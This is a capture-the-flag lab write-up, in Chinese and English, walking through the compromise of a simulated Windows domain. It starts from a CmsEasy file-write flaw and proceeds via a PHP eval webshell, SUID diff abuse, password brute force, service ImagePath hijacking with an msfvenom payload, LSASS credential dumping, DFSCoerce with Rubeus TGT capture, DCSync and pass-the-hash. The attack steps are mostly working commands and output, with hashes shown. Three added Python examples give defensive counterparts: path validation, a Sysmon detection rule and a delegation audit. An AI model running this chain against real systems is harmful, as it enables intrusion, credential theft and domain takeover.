春秋云镜-Delegation

This article was updated on 2025.03.01

Pentesting


flag01

webshell

start infoscan
39.98.121.30:21 open
39.98.121.30:22 open
39.98.121.30:3306 open
39.98.121.30:80 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.98.121.30 code:200 len:68104 title:中文网页标题39.98.121.30

Four ports are open; port 80 is a CmsEasy site.

The page source reveals the version: CmsEasy 7_7_5_20210919.

The back end at /admin accepts the weak credentials admin/123456. An arbitrary file upload (file write) PoC for this version is available online: the template-save action takes a template path that is not confined to the template directory.

The request below is a Yakit template ({{url(...)}} is Yakit's URL-encoding fuzz tag):

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.98.121.30
Cookie: PHPSESSID=8j2ut1rkp5ai0t6sqif66s47sd; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 16

sid={{url(#data_d_.._d_.._d_.._d_1.php)}}&slen=693&scontent={{url(<?php eval($_POST['1']);phpinfo();?>)}}

After the request is sent, 1.php appears in the web root: the sid parameter is used as the template file path, and the .. segments in it walk out of the template directory.
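The request works because the template-save handler trusts sid as a file path: the ../ segments escape the template directory and the .php extension is never checked. As an added example (not from the write-up and not CmsEasy's code), the Python below puts the vulnerable pattern next to a hardened version that resolves the final path, requires it to stay under the template directory and allows only template extensions. The template/default layout, the extension allowlist and the sample payload are constructed for the demo.

```python
import os
import shutil
import tempfile

TEMPLATE_DIR = os.path.join("template", "default")   # assumed layout, mirroring site=default
ALLOWED_EXT = {".html", ".htm", ".tpl"}              # assumed allowlist of template file types


def save_template_unsafe(webroot: str, sid: str, content: str) -> str:
    """Vulnerable pattern: `sid` is trusted, so '..' segments walk out of the
    template directory and any extension, .php included, is written as-is."""
    target = os.path.normpath(os.path.join(webroot, TEMPLATE_DIR, sid))
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "w", encoding="utf-8") as fh:
        fh.write(content)
    return target


def save_template_safe(webroot: str, sid: str, content: str) -> str:
    """Hardened: resolve the final path, require it to stay inside the template
    directory, and accept only template extensions. Raises ValueError otherwise."""
    base = os.path.realpath(os.path.join(webroot, TEMPLATE_DIR))
    target = os.path.realpath(os.path.join(base, sid))
    # commonpath, not startswith(): a sibling dir named 'default_evil' would pass a prefix test
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path traversal rejected: {sid!r}")
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"disallowed template extension: {sid!r}")
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "w", encoding="utf-8") as fh:
        fh.write(content)
    return target


def _rel(webroot: str, path: str) -> str:
    """Path relative to the web root, with forward slashes for portable comparison."""
    return os.path.relpath(os.path.realpath(path), os.path.realpath(webroot)).replace(os.sep, "/")


def demo() -> dict:
    """Feed both versions the traversal payload from the request above plus a
    legitimate template, and report what each one did."""
    webroot = tempfile.mkdtemp(prefix="webroot_")
    traversal_sid = "data/../../../1.php"          # constructed: same shape as the sid above
    webshell = "<?php eval($_POST['1']); ?>"      # constructed: matches the PoC body
    results = {}
    try:
        results["unsafe_wrote"] = _rel(webroot, save_template_unsafe(webroot, traversal_sid, webshell))
        for key, sid in (("traversal", traversal_sid), ("php_in_place", "data/shell.php")):
            try:
                save_template_safe(webroot, sid, webshell)
                results[f"safe_rejected_{key}"] = False
            except ValueError:
                results[f"safe_rejected_{key}"] = True
        results["safe_wrote"] = _rel(webroot, save_template_safe(webroot, "data/index.html", "<h1>ok</h1>"))
    finally:
        shutil.rmtree(webroot, ignore_errors=True)
    return results


if __name__ == "__main__":
    print(demo())
```

The unsafe version lands the shell at the web root exactly as in the lab; the safe version rejects both the traversal and a PHP file placed correctly inside the template directory, which matters because the traversal is only half of the bug.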

root

find / -perm -u=s -type f 2>/dev/null

diff has the SUID bit set.

Look up how to abuse a SUID diff: diff | GTFOBins

A find for the flag shows it lives under /home, and SUID diff can read it (diffing against /dev/null prints every line of the target file):

diff --line-format=%L /dev/null /home/f*/f*


flag01: flag{f32fec29-297c-43a5-a5b4-52ae00b09a16}

flag02

Internal network enumeration

The flag01 file mentions WIN19\Adrian. The WIN19\ prefix is a host name rather than the domain, so this is a local account on the WIN19 machine.

Set up a SOCKS proxy through the compromised web server first, then scan the internal network with fscan:

./fscan -h 172.22.4.36/24
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] NetBios 172.22.4.45 XIAORANG\WIN19
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.36 code:200 len:68100 title:中文网页标题
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server

To summarise:

172.22.4.7   DC01, the domain controller
172.22.4.19  FILESERVER.xiaorang.lab
172.22.4.36  the internet-facing web server (already compromised)
172.22.4.45  XIAORANG\WIN19

The flag01 hint also mentions rockyou, so run rockyou.txt against Adrian's account on 172.22.4.45 (one user against a whole wordlist is a brute force rather than a spray, so mind the lockout policy on a real target):

proxychains crackmapexec smb 172.22.4.45 -u 'Adrian' -p rockyou.txt -d WIN19

The password is babygirl1, but crackmapexec reports that it has expired.

system

RDP in directly; when a password has expired, the Windows logon screen prompts for a new one, so we can reset it there:

proxychains4 rdesktop 172.22.4.45 -u 'Adrian' -p 'babygirl1' -z -r disk:share=/root/tmp

Once logged in, there is a folder on the desktop.

It contains an HTML file that turns out to be a security assessment report listing two High-severity findings.

One of them notes that the current user can modify the registry key of the gupdate service.

The ImagePath value under a service key is the executable the Service Control Manager launches when the service starts, and this service runs as LocalSystem (as the resulting shell confirms). Since we can write the key, pointing ImagePath at our own executable and starting the service hands us a SYSTEM shell.

Generate a C2 payload, drop it somewhere Adrian can write (the desktop), and run the following from cmd.

Change the ImagePath:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\testx64.exe" /f

Verify the change:

reg query "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath

Start the service:

sc start gupdate

The Cobalt Strike payload never called back, so switch to a Metasploit bind_tcp payload, which worked. With a bind payload the listener lives on the target and we connect in through the SOCKS proxy, so no route from the internal network back to our machine is needed.

Generate the payload first:

msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > aaa.exe

Start msfconsole through proxychains so the handler can reach the bind port on 172.22.4.45:

proxychains msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 4444
exploit

The session dies after a short time (the Service Control Manager kills a service process that never reports itself as running), so migrate into a SYSTEM-owned process straight away:

migrate 5676
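The escalation above leaves an obvious trace: a registry write to a service's ImagePath pointing at a binary in a user profile. As an added example (not from the write-up), here is detection logic run over constructed Sysmon-style registry SetValue records (Event ID 13 fields TargetObject, Details, Image). It normalises the ImagePath value (environment variables, the \??\ and \SystemRoot\ prefixes, quoting and arguments) and flags services whose binary lives outside trusted install roots or whose key was written by a scripting tool such as reg.exe. The trusted roots and the tool list are assumptions to tune per environment.

```python
import re

# Assumed trusted install roots (lower-case, trailing backslash); binaries anywhere else are suspect.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumed list of tools that legitimately never install services; reg.exe is what the attacker used above.
SCRIPTING_WRITERS = ("reg.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
ENV_VARS = {"%systemroot%": "C:\\Windows", "%windir%": "C:\\Windows", "%programfiles%": "C:\\Program Files"}
IMAGEPATH_KEY = re.compile(r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.I)
BINARY_RE = re.compile(r'^"?(.*?\.(?:exe|sys|dll))"?(?:\s|$)', re.I)


def binary_from_imagepath(value: str):
    """Reduce a raw ImagePath string to the executable it launches, or None if unparseable."""
    v = value.strip()
    for var, real in ENV_VARS.items():                      # expand REG_EXPAND_SZ variables
        v = re.sub(re.escape(var), lambda _m, real=real: real, v, flags=re.I)
    v = re.sub(r"^\\\?\?\\", "", v)                          # strip the \??\ device-path prefix
    v = re.sub(r"^\\SystemRoot\\", lambda _m: "C:\\Windows\\", v, flags=re.I)  # driver-style prefix
    m = BINARY_RE.match(v)
    return m.group(1) if m else None


def assess(event: dict):
    """Return a verdict for an ImagePath SetValue event, or None for anything else."""
    m = IMAGEPATH_KEY.match(event.get("TargetObject", ""))
    if not m or event.get("EventType", "SetValue") != "SetValue":
        return None
    binary = binary_from_imagepath(event.get("Details", ""))
    writer = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if binary is None or not binary.lower().startswith(TRUSTED_ROOTS):
        reasons.append("service binary outside trusted install roots")
    if writer in SCRIPTING_WRITERS:                          # weak alone, strong together with the first
        reasons.append(f"ImagePath written by {writer}")
    return {"service": m.group(1), "binary": binary, "writer": writer,
            "suspicious": bool(reasons), "reasons": reasons}


def scan(events):
    """Run assess() over a batch and keep only the suspicious verdicts."""
    return [v for v in map(assess, events) if v and v["suspicious"]]


# Constructed records in Sysmon Event ID 13 shape; the gupdate one mirrors the reg add above.
SAMPLE_EVENTS = [
    {"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "%SystemRoot%\\System32\\spoolsv.exe", "Image": "C:\\Windows\\System32\\services.exe"},
    {"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\tcpip\\ImagePath",
     "Details": "\\SystemRoot\\System32\\drivers\\tcpip.sys", "Image": "C:\\Windows\\System32\\services.exe"},
    {"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VendorAgent\\ImagePath",
     "Details": "\"C:\\Program Files\\Vendor\\agent.exe\" --service", "Image": "C:\\Windows\\System32\\msiexec.exe"},
    {"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\gupdate\\Start",
     "Details": "DWORD (0x00000002)", "Image": "C:\\Windows\\regedit.exe"},
    {"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\gupdate\\ImagePath",
     "Details": "C:\\Users\\Adrian\\Desktop\\testx64.exe", "Image": "C:\\Windows\\System32\\reg.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Only the gupdate rewrite is flagged, with both reasons; the Spooler, driver and vendor-installer records pass because their binaries resolve into trusted roots once variables, prefixes and quoting are normalised. The same normalisation is what lets the rule survive the REG_EXPAND_SZ type the attacker used.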

cat /users/administrator/flag/flag02.txt


flag02: flag{2e435492-d4d1-492f-b066-7ca7679f36f3}

flag03

Dump the local SAM hashes:

meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:bd0f21ed526a885b378895679a412387:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::

These are local SAM hashes and do not get us anywhere in the domain by themselves.

Add a local administrator account for convenient RDP access (we could not manage this from the msf shell, so pass the local Administrator's NT hash with impacket's psexec.py instead):

proxychains4 python psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

Add the account:

net user fffffilm Password@973 /add
net localgroup administrators fffffilm /add


Then dump credentials from LSASS with kiwi:

meterpreter > load kiwi
meterpreter > creds_all

Username  Domain    NTLM                              SHA1
--------  --------  --------------------------------  ----------------------------------------
Adrian    WIN19     bd0f21ed526a885b378895679a412387  aec0482541df707c56267fbdb5ee39b622b593da
WIN19$    XIAORANG  5943c35371c96f19bda7b8e67d041727  5a4dc280e89974fdec8cf1b2b76399d26f39b8f8

Collect domain data with bloodhound-python, authenticating as the WIN19$ machine account (the hash in this command differs from the WIN19$ NT hash kiwi dumped above; machine-account passwords rotate, so use whichever value kiwi currently shows):

┌──(root㉿kali)-[~/Desktop/tools/BloodHound-python]
└─# proxychains python3 bloodhound.py -u "WIN19$" --hashes f013947fa647df6403a4653648059060:f013947fa647df6403a4653648059060 -d xiaorang.lab -dc DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: DC01.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: DC01.xiaorang.lab
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: WIN19.xiaorang.lab
INFO: Querying computer: FILESERVER.xiaorang.lab
INFO: Querying computer: DC01.xiaorang.lab
INFO: Done in 00M 25S
INFO: Compressing output into 20250228175948_bloodhound.zip

Analysis shows that both WIN19 and DC01 are configured for unconstrained delegation (domain controllers have this by default, so the interesting finding is WIN19).

Unconstrained delegation means that when a client authenticates to WIN19 over Kerberos, the KDC includes a forwardable copy of the client's TGT in the service ticket, and WIN19 caches that TGT in LSASS. So if we can make the domain controller's machine account authenticate to WIN19, DC01$'s TGT lands in WIN19's memory; we extract it, inject it into our session, and use it to DCSync every hash in the domain.
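How a collector such as bloodhound-python decides this is worth seeing in code. As an added example (not the write-up's or BloodHound's code), the Python below classifies constructed LDAP-style entries by the userAccountControl bits and delegation attributes that collectors read, and picks out the hosts where coercing the DC pays off: computers trusted for unconstrained delegation that are not themselves domain controllers. The entries mirror the hosts in this lab; svc_web is hypothetical and all attribute values are made up.

```python
# Bits of userAccountControl that govern delegation (values as documented in MS-ADTS / MS-SAMR).
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000                        # set on domain controller computer accounts
UF_TRUSTED_FOR_DELEGATION = 0x80000                     # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                             # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition

# The LDAP filter collectors use for unconstrained hosts: bitwise-AND matching rule on the UAC bit.
LDAP_FILTER_UNCONSTRAINED = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"


def classify_delegation(entry: dict) -> dict:
    """Map one LDAP-style entry to its delegation posture."""
    uac = int(entry.get("userAccountControl", 0))
    is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
    if uac & UF_TRUSTED_FOR_DELEGATION:
        kind = "unconstrained"
    elif entry.get("msDS-AllowedToDelegateTo"):
        kind = ("constrained (protocol transition)"
                if uac & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION else "constrained")
    else:
        kind = "none"
    return {
        "name": entry["sAMAccountName"],
        "delegation": kind,
        "targets": list(entry.get("msDS-AllowedToDelegateTo", [])),
        "is_dc": is_dc,
        # RBCD: some other principal may impersonate users *to* this account
        "rbcd_configured": bool(entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity")),
        # TGTs of these accounts are never forwarded, so coercion cannot capture them
        "protected_from_delegation": bool(uac & UF_NOT_DELEGATED),
        # a DC trusting itself is the default and gains nothing; a non-DC host is the prize
        "abusable": bool(uac & UF_TRUSTED_FOR_DELEGATION) and not is_dc,
    }


def coercion_targets(entries):
    """Hosts where forcing DC01$ to authenticate leaves a usable DC TGT in LSASS."""
    return [r for r in map(classify_delegation, entries) if r["abusable"]]


# Constructed entries modelled on this lab; svc_web is hypothetical and every value is made up.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC01$", "userAccountControl": 532480},            # 0x82000: DC + unconstrained
    {"sAMAccountName": "WIN19$", "userAccountControl": 528384},           # 0x81000: workstation + unconstrained
    {"sAMAccountName": "FILESERVER$", "userAccountControl": 4096},        # 0x1000: plain workstation trust
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1000200,        # NORMAL_ACCOUNT + TRUSTED_TO_AUTH
     "msDS-AllowedToDelegateTo": ["cifs/FILESERVER.xiaorang.lab"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x100200},  # NORMAL_ACCOUNT + NOT_DELEGATED
]

if __name__ == "__main__":
    for r in map(classify_delegation, SAMPLE_ENTRIES):
        print(f"{r['name']:<14} {r['delegation']:<34} dc={r['is_dc']} abusable={r['abusable']}")
    print("coerce the DC towards:", [r["name"] for r in coercion_targets(SAMPLE_ENTRIES)])
```

The decision that matters for this box is the last field: DC01 shows up as unconstrained too, but only WIN19 is a place where a coerced DC01$ authentication yields a ticket we did not already own. The protected_from_delegation flag is the check to run before coercing a specific user rather than a machine account, since accounts marked NOT_DELEGATED (and Protected Users members, not modelled here) never hand over a forwardable TGT.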

RDP in as the administrator account we just added:

proxychains4 rdesktop 172.22.4.45 -u 'fffffilm' -p 'Password@973'  -r disk:share=/root/tmp

Start Rubeus in monitor mode first, filtering for tickets belonging to dc01$ (this must run from an elevated prompt because it reads tickets out of LSASS):

.\Rubeus.exe monitor /interval:1 /filteruser:dc01$

Then coerce the DC into authenticating to WIN19 (coercion methods are summarised in 奇安信攻防社区-红队域渗透NTLM Relay:强制认证方式总结). dfscoerce.py abuses the MS-DFSNM RPC interface to make DC01 connect back to the listener we name; passing the host name WIN19 rather than an IP matters, because the DC then requests a Kerberos ticket for it and its forwardable TGT is sent along:

proxychains4 python dfscoerce.py -u "WIN19$" -hashes :5943c35371c96f19bda7b8e67d041727 -d xiaorang.lab WIN19 172.22.4.7


Once Rubeus prints the captured base64 TGT, inject it into the current logon session:

.\Rubeus.exe ptt /ticket:<base64 TGT captured by Rubeus>


Run mimikatz and, with DC01$'s TGT in the session, DCSync all domain hashes:

lsadump::dcsync /all /csv


Finally pass the domain Administrator's NT hash from the DCSync output to FILESERVER and read the flag:

proxychains crackmapexec smb 172.22.4.19 -u administrator -H 4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"


flag03: flag{608368ba-4efc-493b-914e-8e67eac324cb}

flag04

The same hash works against the domain controller:

proxychains crackmapexec smb 172.22.4.7 -u administrator -H 4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"


flag04: flag{25d59671-4d7d-4b8c-8927-bca843c1a12c}